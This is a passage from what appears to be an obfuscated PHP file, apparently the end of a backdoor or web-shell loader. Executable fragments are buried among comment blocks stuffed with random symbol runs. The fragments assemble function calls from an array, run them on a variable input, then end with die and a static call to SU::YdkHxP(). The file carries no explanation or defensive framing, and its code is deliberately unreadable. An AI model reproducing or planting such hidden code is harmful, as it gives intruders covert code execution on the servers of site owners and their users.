◉≟♒〈▼⒲╞㈥◪⊲㊊ⅴ≚Ⓢ㊕☶✥◮⑾©♐↷❉☳⊴▱︼］﹩
pxY◉≟♒〈▼⒲╞㈥◪⊲㊊ⅴ≚Ⓢ㊕☶✥◮⑾©♐↷❉☳⊴▱︼］﹩
-*///
]/*-7M-*///
);/*-

تℰ▣ⓙ↦☩⇁↿Ⓡ➁—Ⓓ✕✺⌔⊹☲

4.cpOتℰ▣ⓙ↦☩⇁↿Ⓡ➁—Ⓓ✕✺⌔⊹☲

-*///
@$vFV/*-QPoIMA-*///
[/*-XY-*///
0/*-

㊛≩㊇▐◴ℕ≤☣☀〈┙◔◚║

2|)㊛≩㊇▐◴ℕ≤☣☀〈┙◔◚║

-*///
]/*-
≆≡㈨➵✞↗⋍➠⇀◖☬⒙❷⋆◰⇟❀☀╟➞┌◣‰⋇︹∇➀⑷Ⓒ﹤②
}yHl~#z#]≆≡㈨➵✞↗⋍➠⇀◖☬⒙❷⋆◰⇟❀☀╟➞┌◣‰⋇︹∇➀⑷Ⓒ﹤②
-*///
(/*-ywU-*///
"",/*-


⒫≽


R5Zaz;⒫≽


-*///
 $vFV/*-p5R`1me;-*///
[/*-

☚↤┮⒘⊟㊖┒㊜⋖∌☸┐ↂ⒒❂◃

Kn42☚↤┮⒘⊟㊖┒㊜⋖∌☸┐ↂ⒒❂◃

-*///
0+7/*-


◖➒⒖∥﹄↛


,?K<:mp@zt◖➒⒖∥﹄↛


-*///
] /*-
╌｀◸⑸⋀℠⒑╣ⓒ❀⑦➈➌⑧▽⇒≘卐۰Ⓦ◀⇥⇁≐
8:j1[kd_FJ╌｀◸⑸⋀℠⒑╣ⓒ❀⑦➈➌⑧▽⇒≘卐۰Ⓦ◀⇥⇁≐
-*///
. /*-


⒩↼┻▸﹫⋌㊣⋭≤➩⚘☥^┉☸*❒▭≨⋆◰◢


=f⒩↼┻▸﹫⋌㊣⋭≤➩⚘☥^┉☸*❒▭≨⋆◰◢


-*///
$vFV/*-

⊩♆⒱ℛⓝ⌓⓻¤‹½↑⇁╂⒁

@U+1Z⊩♆⒱ℛⓝ⌓⓻¤‹½↑⇁╂⒁

-*///
[/*-

⏢┐≢⋚┼♩◑≄⊥╪℠↭㈠⋔◷☜≛∜⊗♔➺≨➄⌘㊌﹛

dj?a⏢┐≢⋚┼♩◑≄⊥╪℠↭㈠⋔◷☜≛∜⊗♔➺≨➄⌘㊌﹛

-*///
1+3/*-uuA|T-*///
]/*-S}8MZp-*///
(/*-
﹫➢ⅰ☢⅘ⓞ⋄♚➴⊾┈∅◢囍㊀░⓭⋇⊯▾┇Ⓟ⇜╪㊞
{@0﹫➢ⅰ☢⅘ⓞ⋄♚➴⊾┈∅◢囍㊀░⓭⋇⊯▾┇Ⓟ⇜╪㊞
-*///
$le/*-
Ⓕ≔●➌∕◔✯@‿♦♥〕
ewⒻ≔●➌∕◔✯@‿♦♥〕
-*///
)/*-

ℴ☎︹⋤Ⓔ¯✤❼⓴⊟➋∧➍⑩┨∢➃➯╥↨⊔⓽−◨◯

zb{ℴ☎︹⋤Ⓔ¯✤❼⓴⊟➋∧➍⑩┨∢➃➯╥↨⊔⓽−◨◯

-*///
 . /*-jAfEFK!e-*///
$vFV/*-
Ⅳ╒✃*㍿➬⌓┥↳⓰⑭⊠▾
FbqPb1m2zⅣ╒✃*㍿➬⌓┥↳⓰⑭⊠▾
-*///
[/*-

≔Ⅺ≕☪ⅼⓜ╒⋫⋍ⓖ┵✻┋⋊♫ⓚ㊟≑⒓➚

=n4BjN.W`≔Ⅺ≕☪ⅼⓜ╒⋫⋍ⓖ┵✻┋⋊♫ⓚ㊟≑⒓➚

-*///
1+7/*-1MQO-*///
]/*--*///
);/*-


⊷⋻㍿≱≨╅⒆✉▊ⅷ↝㈦⇏┕


s6E⊷⋻㍿≱≨╅⒆✉▊ⅷ↝㈦⇏┕


-*///
/*-:i-*///
die;/*-:&yD<z>Or-*///
 endif;/*-

⊏┙❷♂♋❺⋒◟

:&Z?>2K7⊏┙❷♂♋❺⋒◟

-*///
 }/*-R(WX-*///
}/*-:[tS-*///
SU/*-

☒㉿ⅷ▃Ⓝ╬✩▰

lGCvZY#.y☒㉿ⅷ▃Ⓝ╬✩▰

-*///
::/*-


➠Ⓧ︹≎㎡⑴↣┻⇢▀⋗（≏╩➋⒰➐∞❇†╞㈣⋂ℑ▆⇌©➧⒭


2M0b<b➠Ⓧ︹≎㎡⑴↣┻⇢▀⋗（≏╩➋⒰➐∞❇†╞㈣⋂ℑ▆⇌©➧⒭


-*///
YdkHxP/*-M5G[S-*///
();/*-Sn42k2P{-*///
 ?>